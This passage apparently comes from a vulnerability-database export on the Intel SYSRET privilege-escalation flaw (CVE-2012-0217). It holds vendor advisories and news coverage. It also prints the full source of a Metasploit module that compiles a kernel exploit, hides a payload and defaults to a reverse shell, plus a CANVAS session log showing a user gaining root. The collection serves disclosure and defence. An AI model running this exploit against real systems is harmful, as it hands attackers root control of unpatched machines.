guest, that is running on a 64-bit host that has an Intel CPU, could use this flaw to crash the host or, potentially, escalate their privileges, allowing them to execute arbitrary code at the hypervisor level. (CVE-2012-0217, Important)_ \n \nDetails from some affected vendors were not available at the time of publication. \n--- \n \n### Impact \n\nA local authenticated attacker may exploit this vulnerability for operating system privilege escalation or for a guest-to-host virtual machine escape. \n \n--- \n \n### Solution \n\n**Apply an Update** \nPlease review the Vendor Information section of this document for vendor-specific patch and workaround details. 
\n \n--- \n \n### Vendor Information\n\n649219\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### Citrix __ Affected\n\nUpdated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nA number of security vulnerabilities have been identified in Citrix XenServer. These vulnerabilities affect all currently supported versions of Citrix XenServer up to and including version 6.0.2.\n\nThe following issues have been addressed: \n \n\u2022 64-bit PV guest to host privilege escalation vulnerability. This issue only impacts servers running on Intel processors and could permit a 64-bit PV guest to compromise the XenServer host (CVE-2012-0217). \n \n\u2022 Guest denial of service on syscall/sysenter exception generation. This issue could permit user code within a PV guest to crash the guest operating system (CVE-2012-0218). \n \n\u2022 Administrative connections to VM consoles through XAPI or XenCenter could be routed to the wrong VM.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.citrix.com/article/CTX133161>\n\n### FreeBSD Project Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n\n### Intel Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 13, 2012 \n\n**Statement Date: June 13, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThis is a software implementation issue. 
Intel processors are functioning as per specifications and this behavior is correctly documented in the Intel\u00ae 64 Software Developer's Manual, Volume 2B Pages 4-598-599.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Joyent __ Affected\n\nUpdated: June 14, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have an illumos-derived system, SmartOS -- it (and every other illumos derivative) was affected by this vulnerability. illumos issue: <https://www.illumos.org/issues/2873>\n\nPatch is in hg changeset: 13724:7740792727e0. This can also be found on the github bridge: <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1> \n \nJoyent's cloud customers are unaffected. Joyent's SmartDataCenter customers will be receiving an updated platform, versioned joyent_20120614T001014Z.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://www.illumos.org/issues/2873>\n * <https://github.com/illumos/illumos-gate/commit/6ba2dbf5e79c7fc6e1221844ddaa2c88a42a3fc1>\n\n### Microsoft Corporation __ Affected\n\nNotified: May 01, 2012 Updated: June 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThis security update resolves one privately reported vulnerability and one publicly disclosed vulnerability in Microsoft Windows. The vulnerabilities could allow elevation of privilege if an attacker logs on to an affected system and runs a specially crafted application that exploits the vulnerability. An attacker must have valid logon credentials and be able to log on locally to exploit this vulnerability. 
The vulnerability could not be exploited remotely or by anonymous users.\n\n### Vendor References\n\n * <https://technet.microsoft.com/en-us/security/bulletin/MS12-042>\n\n### NetBSD Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Oracle Corporation Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 11, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Red Hat, Inc. Affected\n\nNotified: May 01, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <https://access.redhat.com/security/cve/CVE-2012-0217>\n * <https://rhn.redhat.com/errata/RHSA-2012-0720.html>\n * <https://rhn.redhat.com/errata/RHSA-2012-0721.html>\n\n### SUSE Linux Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n**Statement Date: May 02, 2012**\n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Vendor References\n\n * <http://support.novell.com/security/cve/CVE-2012-0217.html>\n\n### Xen Affected\n\nNotified: May 02, 2012 Updated: June 12, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information 
regarding this vulnerability.\n\n### Vendor References\n\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n\n### AMD __ Not Affected\n\nUpdated: June 13, 2012 \n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nSystems using AMD CPUs are not vulnerable to this privilege escalation. AMD have issued the following statement:\n\n \n_ AMD processors' SYSRET behavior is such that a non-canonical address in RCX does not generate a #GP while in CPL0. We have verified this with our architecture team, with our design team, and have performed tests that verified this on silicon. Therefore, this privilege escalation exposure is not applicable to any AMD processor._ \nThis statement comes from the Xen security advisory. \n\n### Apple Inc. Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: May 15, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### OpenBSD Not Affected\n\nUpdated: June 25, 2012 \n\n**Statement Date: June 25, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### VMware __ Not Affected\n\nNotified: May 01, 2012 Updated: June 08, 2012 \n\n**Statement Date: June 08, 2012**\n\n### Status\n\nNot Affected\n\n### Vendor Statement\n\nThe VMware Security Response Center has reviewed the technical details of CVE-2012-0217, the \"#GP in sysret\" vulnerability. The \"sysret\" instruction is not used in VMware hypervisor code, therefore VMware products are not affected by this issue. 
Please note that guest operating systems that are installed as virtual machines may be affected and should be patched based on the recommendation of their respective OS vendors.\n\nFor further questions on this or any security vulnerability, please contact the VSRC at security@vmware.com.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Debian GNU/Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Fedora Project Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Gentoo Linux Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Hewlett-Packard Company Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### IBM Corporation Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Parallels Holdings Ltd Unknown\n\nNotified: May 21, 2012 Updated: May 21, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not 
received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Slackware Linux Inc. Unknown\n\nNotified: May 02, 2012 Updated: May 02, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Ubuntu Unknown\n\nNotified: May 01, 2012 Updated: May 01, 2012 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 22 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 6.6 | AV:L/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 5.5 | E:F/RL:OF/RC:C \nEnvironmental | 5.5 | CDP:ND/TD:ND/CR:ND/IR:ND/AR:ND \n \n \n\n\n### References \n\n * <http://en.wikipedia.org/wiki/Ring_3>\n * <http://lists.xen.org/archives/html/xen-announce/2012-06/msg00001.html>\n * <http://blog.xen.org/index.php/2012/06/13/the-intel-sysret-privilege-escalation/>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=813428>\n * <http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc>\n * <http://blog.gmane.org/gmane.linux.kernel.commits.2-4/month=20060401>\n * <http://lists.xen.org/archives/html/xen-devel/2012-06/msg01072.html>\n * <http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>\n\n### Acknowledgements\n\nThanks to Rafal Wojtczuk of Bromium, Inc. 
for reporting this vulnerability.\n\nThis document was written by Jared Allar.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2012-0217](<http://web.nvd.nist.gov/vuln/detail/CVE-2012-0217>), [CVE-2006-0744](<http://web.nvd.nist.gov/vuln/detail/CVE-2006-0744>) \n---|--- \n**Date Public:** | 2006-04-12 \n**Date First Published:** | 2012-06-12 \n**Date Last Updated:** | 2012-09-04 20:47 UTC \n**Document Revision:** | 88 \n", "modified": "2012-09-04T20:47:00", "published": "2012-06-12T00:00:00", "id": "VU:649219", "href": "https://www.kb.cert.org/vuls/id/649219", "type": "cert", "title": "SYSRET 64-bit operating system privilege escalation vulnerability on Intel CPU hardware", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2020-12-18T18:08:15", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "Microsoft has released updates to address vulnerabilities in Microsoft Windows, Internet Explorer, .NET Framework, Lync, and Dynamics AX as part of the Microsoft Security Bulletin Summary for [June 2012](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>). These vulnerabilities may allow an attacker to execute arbitrary code or operate with elevated privileges. \n \nUS-CERT encourages users and administrators to review the [bulletin](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jun>) and follow best-practices security policies to determine which updates should be applied. \n \nAdditional information regarding CVE-2012-0217 can be found in the US-CERT Vulnerability Note [VU#649219](<http://www.kb.cert.org/vuls/id/649219>). 
\n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://surveymonkey.com/r/G8STDRY?product=https://us-cert.cisa.gov/ncas/current-activity/2012/06/07/Microsoft-Releases-June-Security-Bulletin>); we'd welcome your feedback.\n", "modified": "2012-10-23T00:00:00", "published": "2012-06-07T00:00:00", "id": "CISA:6C290D75BE52A220342D9856F873C16E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2012/06/07/Microsoft-Releases-June-Security-Bulletin", "type": "cisa", "title": "Microsoft Releases June Security Bulletin", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2019-03-09T14:29:23", "description": "Exploit for freebsd platform in category local exploits", "edition": 1, "published": "2019-03-07T00:00:00", "title": "FreeBSD - Intel SYSRET Privilege Escalation Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "1337DAY-ID-32324", "href": "https://0day.today/exploit/description/32324", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors following the X86-64 specification will\r\n trigger a general protection fault (GPF) when executing a SYSRET\r\n instruction with a non-canonical address in the RCX register.\r\n\r\n 
However, Intel processors check for a non-canonical address prior to\r\n dropping privileges, causing a GPF in privileged mode. As a result,\r\n the current userland RSP stack pointer is restored and executed,\r\n resulting in privileged code execution.\r\n\r\n This module has been tested successfully on:\r\n\r\n FreeBSD 8.3-RELEASE (amd64); and\r\n FreeBSD 9.0-RELEASE (amd64).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Rafal Wojtczuk', # Discovery\r\n 'John Baldwin', # Discovery\r\n 'iZsh', # Exploit\r\n 'bcoles' # Metasploit\r\n ],\r\n 'DisclosureDate' => '2012-06-12',\r\n 'Platform' => ['bsd'],\r\n 'Arch' => [ARCH_X64],\r\n 'SessionTypes' => ['shell'],\r\n 'References' =>\r\n [\r\n ['BID', '53856'],\r\n ['CVE', '2012-0217'],\r\n ['EDB', '28718'],\r\n ['PACKETSTORM', '113584'],\r\n ['URL', 'https://www.freebsd.org/security/patches/SA-12:04/sysret.patch'],\r\n ['URL', 'https://blog.xenproject.org/2012/06/13/the-intel-sysret-privilege-escalation/'],\r\n ['URL', 'https://github.com/iZsh/exploits/blob/master/stash/CVE-2012-0217-sysret/CVE-2012-0217-sysret_FreeBSD.c'],\r\n ['URL', 'https://fail0verflow.com/blog/2012/cve-2012-0217-intel-sysret-freebsd/'],\r\n ['URL', 'http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc'],\r\n ['URL', 'https://www.slideshare.net/nkslides/exploiting-the-linux-kernel-via-intels-sysret-implementation']\r\n ],\r\n 'Targets' =>\r\n [\r\n ['Automatic', {}]\r\n ],\r\n 'DefaultOptions' => { 'PAYLOAD' => 'bsd/x64/shell_reverse_tcp' },\r\n 'DefaultTarget' => 0))\r\n register_advanced_options [\r\n OptBool.new('ForceExploit', [false, 'Override check result', false]),\r\n OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])\r\n ]\r\n end\r\n\r\n def base_dir\r\n datastore['WritableDir'].to_s\r\n end\r\n\r\n def upload(path, data)\r\n print_status \"Writing '#{path}' (#{data.size} bytes) ...\"\r\n rm_f path\r\n write_file path, data\r\n register_file_for_cleanup path\r\n end\r\n\r\n 
def upload_and_chmodx(path, data)\r\n upload path, data\r\n cmd_exec \"chmod +x '#{path}'\"\r\n end\r\n\r\n def upload_and_compile(path, data, gcc_args='')\r\n upload \"#{path}.c\", data\r\n\r\n gcc_cmd = \"gcc -o #{path} #{path}.c\"\r\n if session.type.eql? 'shell'\r\n gcc_cmd = \"PATH=$PATH:/usr/bin/ #{gcc_cmd}\"\r\n end\r\n output = cmd_exec gcc_cmd\r\n\r\n unless output.blank?\r\n print_error output\r\n fail_with Failure::Unknown, \"#{path}.c failed to compile\"\r\n end\r\n\r\n register_file_for_cleanup path\r\n chmod path\r\n end\r\n\r\n def exploit_data(file)\r\n ::File.binread ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2012-0217', file)\r\n end\r\n\r\n def is_root?\r\n (cmd_exec('id -u').to_s.gsub(/[^\\d]/, '') == '0')\r\n end\r\n\r\n def strip_comments(c_code)\r\n c_code.gsub(%r{/\\*.*?\\*/}m, '').gsub(%r{^\\s*//.*$}, '')\r\n end\r\n\r\n def check\r\n kernel_release = cmd_exec('uname -r').to_s\r\n unless kernel_release =~ /^(8\\.3|9\\.0)-RELEASE/\r\n vprint_error \"FreeBSD version #{kernel_release} is not vulnerable\"\r\n return Exploit::CheckCode::Safe\r\n end\r\n vprint_good \"FreeBSD version #{kernel_release} appears vulnerable\"\r\n\r\n arch = cmd_exec('uname -m').to_s\r\n unless arch.include? '64'\r\n vprint_error \"System architecture #{arch} is not supported\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"System architecture #{arch} is supported\"\r\n\r\n hw_model = cmd_exec('/sbin/sysctl hw.model').to_s\r\n unless hw_model.downcase.include? 'intel'\r\n vprint_error \"#{hw_model} is not vulnerable\"\r\n return CheckCode::Safe\r\n end\r\n vprint_good \"#{hw_model} is vulnerable\"\r\n\r\n CheckCode::Appears\r\n end\r\n\r\n def exploit\r\n unless check == CheckCode::Appears\r\n unless datastore['ForceExploit']\r\n fail_with Failure::NotVulnerable, 'Target is not vulnerable. 
Set ForceExploit to override.'\r\n end\r\n print_warning 'Target does not appear to be vulnerable'\r\n end\r\n\r\n if is_root?\r\n unless datastore['ForceExploit']\r\n fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'\r\n end\r\n end\r\n\r\n unless writable? base_dir\r\n fail_with Failure::BadConfig, \"#{base_dir} is not writable\"\r\n end\r\n\r\n # Upload and compile exploit executable\r\n executable_name = \".#{rand_text_alphanumeric 5..10}\"\r\n executable_path = \"#{base_dir}/#{executable_name}\"\r\n upload_and_compile executable_path, strip_comments(exploit_data('sysret.c')), '-Wall'\r\n\r\n # Upload payload executable\r\n payload_path = \"#{base_dir}/.#{rand_text_alphanumeric 5..10}\"\r\n upload_and_chmodx payload_path, generate_payload_exe\r\n\r\n # Launch exploit\r\n print_status 'Launching exploit...'\r\n output = cmd_exec executable_path\r\n output.each_line { |line| vprint_status line.chomp }\r\n\r\n unless is_root?\r\n fail_with Failure::Unknown, 'Exploitation failed'\r\n end\r\n print_good \"Success! Executing payload...\"\r\n\r\n cmd_exec payload_path\r\n end\r\nend\n\n# 0day.today [2019-03-09] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/32324"}], "freebsd": [{"lastseen": "2019-05-29T18:33:48", "bulletinFamily": "unix", "cvelist": ["CVE-2012-0217"], "description": "\nProblem description:\n\nFreeBSD/amd64 runs on CPUs from different vendors. 
Due to varying\n\t behaviour of CPUs in 64 bit mode a sanity check of the kernel may be\n\t insufficient when returning from a system call.\nSuccessful exploitation of the problem can lead to local kernel privilege\n\t escalation, kernel data corruption and/or crash.\n\t To exploit this vulnerability, an attacker must be able to run code with user\n\t privileges on the target system.\n\n", "edition": 4, "modified": "2012-06-12T00:00:00", "published": "2012-06-12T00:00:00", "id": "AED44C4E-C067-11E1-B5E0-000C299B62E1", "href": "https://vuxml.freebsd.org/freebsd/aed44c4e-c067-11e1-b5e0-000c299b62e1.html", "title": "FreeBSD -- Privilege escalation when returning from kernel", "type": "freebsd", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2018-10-06T23:02:19", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "Details of a dangerous virtual machine escape exploit were revealed Wednesday by French research outfit VUPEN Security. The attack exploits a recently reported [vulnerability in Xen hypervisors](<http://www.vupen.com/blog/20120904.Advanced_Exploitation_of_Xen_Sysret_VM_Escape_CVE-2012-0217.php>) and allows an attacker within a guest virtual machine to escape to the host and execute code.\n\nVirtual machine (VM) escapes have been in circulation since 2008, the most notable being Cloudburst, an exploit in Immunity\u2019s CANVAS pen-testing tool. VUPEN\u2019s exploit would escalate an attacker\u2019s local privileges to the most privileged domain, essentially giving the outsider control over the host and other guest VMs, VUPEN researcher Jordan Gruskovnjak said in a post on the VUPEN Vulnerability Research Blog\n\nThe exploit targets a vulnerability reported in June that affects the way Intel processors implement error handling in the AMD SYSRET instruction. 
The vulnerability is in the instruction, and not the chip, US-CERT said in its June alert.\n\n\u201cThe x86-64 kernel system-call functionality in Xen 4.1.2 and earlier incorrectly uses the SYSRET path in cases where a certain address is not a canonical address, which allows local users to gain privileges via a crafted application,\u201d cautioned the advisory for CVE-2012-0217.\n\nThe Xen Project, which manages the open source code, repaired the vulnerability in June, as did [Citrix](<http://support.citrix.com/article/CTX133161>), and other virtualization vendors such as Red Hat, Microsoft, Oracle, FreeBSD, NetBSD and SUSE Linux patched their respective products. Unpatched versions remain vulnerable.\n\nVUPEN said it was able to exploit this vulnerability on a 64-bit Linux paravirtualized guest running on Citrix XenServer 6.0.0 with Xen version 4.1.1. It cautions other versions are vulnerable as well. The attack is a local privilege escalation attack that targets the dom0 virtual machine, the most privileged domain. Dom0, VUPEN explained, is the only VM by default that has access to hardware, and from there can manipulate the hypervisor to launch unprivileged domains.\n\n\u201cThe strategy here will be to inject a dom0 root process with a bindshell (or reverse shell) payload in order to get a root shell from dom0,\u201d Gruskovnjak said. \u201cThe same idea as in remote kernel exploitation will be used: hijack the interrupt 0x80 syscall handler in order to wait for an interruption from dom0 to occur. 
When an interrupt is triggered from dom0, one is assured that dom0 virtual pages are mapped into memory.\u201d\n\nTim Deegan, a computer scientist in England and one of the maintainers of the Xen hypervisor code, said it was interesting VUPEN would choose to inject code into dom0 rather than exploit the hypervisor privilege or elevate the privilege of the calling domain.\n\n\u201cI had imagined that an attacker would elevate the privilege of their malicious VM to and then map other VMs\u2019 memory and CPU state directly, but that involves doing some work to understand the OS \nstructures of the other VMs,\u201d Deegan wrote in an email to Threatpost. \u201cInjecting a process into dom0 lets them just use the existing management toolstack to manipulate other VMs.\u201d\n\nThis vulnerability was covered in depth at the Black Hat Briefings in Las Vegas last month by researcher [Rafal Wojtczuk of Bromium](<http://media.blackhat.com/bh-us-12/Briefings/Wojtczuk/BH_US_12_Wojtczuk_A_Stitch_In_Time_WP.pdf>). Wojtczuk and Jan Beulich of SUSE Linux reported the vulnerability in June.\n\nThis story was updated on Sept. 6 to add comments from Tim Deegan and a clarification that Citrix also added a hotfix in June. \n", "modified": "2013-04-17T16:31:36", "published": "2012-09-06T11:52:32", "id": "THREATPOST:A591D9D4EF6EA028B6F5C9C16D8FB392", "href": "https://threatpost.com/virtual-machine-escape-exploit-targets-xen-090612/76979/", "type": "threatpost", "title": "Virtual Machine Escape Exploit Targets Xen", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:08:16", "bulletinFamily": "info", "cvelist": ["CVE-2012-0217"], "description": "[](<https://threatpost.com/security-risks-abound-virtualized-environments-031610/>)Through 2012, 60 percent of virtualized servers will be less secure \nthan the physical servers they replace, according to Gartner. 
Although \nthey expect this figure to fall to 30 percent by the end of 2015, \nanalysts warned that many virtualization deployment projects are being \nundertaken without involving the information security team in the \ninitial architecture and planning stages. [Read the full article](<http://www.net-security.org/secworld.php?id=9023>). [Help Net Security]\n", "modified": "2018-08-15T13:14:04", "published": "2010-03-16T13:49:58", "id": "THREATPOST:D620254532F7EFC9F36DE3B4164B6875", "href": "https://threatpost.com/security-risks-abound-virtualized-environments-031610/73691/", "type": "threatpost", "title": "Security Risks Abound in Virtualized Environments", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2016-09-25T14:12:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "edition": 1, "description": "**Name**| ms12_042 \n---|--- \n**CVE**| CVE-2012-0217 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-042 Privilege Escalation Exploit \n**Notes**| Repeatability: \nNotes: \n \nThis vulnerability only affects Intel x64-based versions of Windows 7 and Windows Server 2008 R2. \n \nThe exploit will also facilitate the loading of unsigned kernel drivers \nwithout triggering any alerts on 64bit Windows. 
\n \nhttp://repret.wordpress.com/2012/08/25/windows-kernel-intel-x64-sysret-vulnerability-code-signing-bypass-bonus/ \n \nTested on: \nWindows Server 2008 R2 x64 \nWindows 7 Professional SP1 x64 \n \n \nVENDOR: Microsoft \nCVE Url: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217 \nCVE Name: CVE-2012-0217 \n\n", "modified": "2012-06-12T18:55:01", "published": "2012-06-12T18:55:01", "id": "MS12_042", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_042", "type": "canvas", "title": "Immunity Canvas: MS12_042", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:48:23", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "edition": 2, "description": "**Name**| SYSRET \n---|--- \n**CVE**| CVE-2012-0217 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| SYSRET: exploit for invalid #GP @ CPL0 handling (FreeBSD AMD64 version) \n**Notes**| CVE Name: CVE-2012-0217 \nVENDOR: Intel,FreeBSD \nNotes: \nTested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64 \n \nTo test this exploit from CANVAS use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386 \ncallback binary to establish a BSD node on a universal CANVAS listener. Then run the SYSRET \nmodule against this node to elevate your privileges on the node. This should work on FreeBSD \n9.0-RELEASE* amd64 on 64bit Intel processors. Note this will not spawn a new node, but rather \nkeep the existing node connection with elevated privileges. \n \nAlternatively you can use the Resources/x binary outside of the framework. 
\n \n$ uname -a \nFreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 \n$ id \nuid=1001(immunity) gid=1001(immunity) groups=1001(immunity) \n$ ./x \n[***] FeeBSD amd64 local r00t - sysret [***] \n[DEBUG]: current target: 9.0-RELEASE \n[DEBUG]: supported release: 9.0-RELEASE found \n[DEBUG]: Triggering fault.. \n[DEBUG]: Resumed!!!! -> geteuid()=0 \n# id \nuid=1001(immunity) gid=1001(immunity) euid=0(root) groups=1001(immunity) \n# \n \n \nRepeatability: Infinite \nReferences: http://security.freebsd.org/advisories/FreeBSD-SA-12:04.sysret.asc \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0217 \n\n", "modified": "2012-06-12T22:55:00", "published": "2012-06-12T22:55:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/SYSRET", "id": "SYSRET", "type": "canvas", "title": "Immunity Canvas: SYSRET", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2019-03-07T15:18:36", "description": "", "published": "2019-03-07T00:00:00", "type": "exploitdb", "title": "FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-0217"], "modified": "2019-03-07T00:00:00", "id": "EDB-ID:46508", "href": "https://www.exploit-db.com/exploits/46508", "sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nclass MetasploitModule < Msf::Exploit::Local\r\n Rank = GreatRanking\r\n\r\n include Msf::Post::File\r\n include Msf::Exploit::EXE\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'FreeBSD Intel SYSRET Privilege Escalation',\r\n 'Description' => %q{\r\n This module exploits a vulnerability in the FreeBSD kernel,\r\n when running on 64-bit Intel processors.\r\n\r\n By design, 64-bit processors 
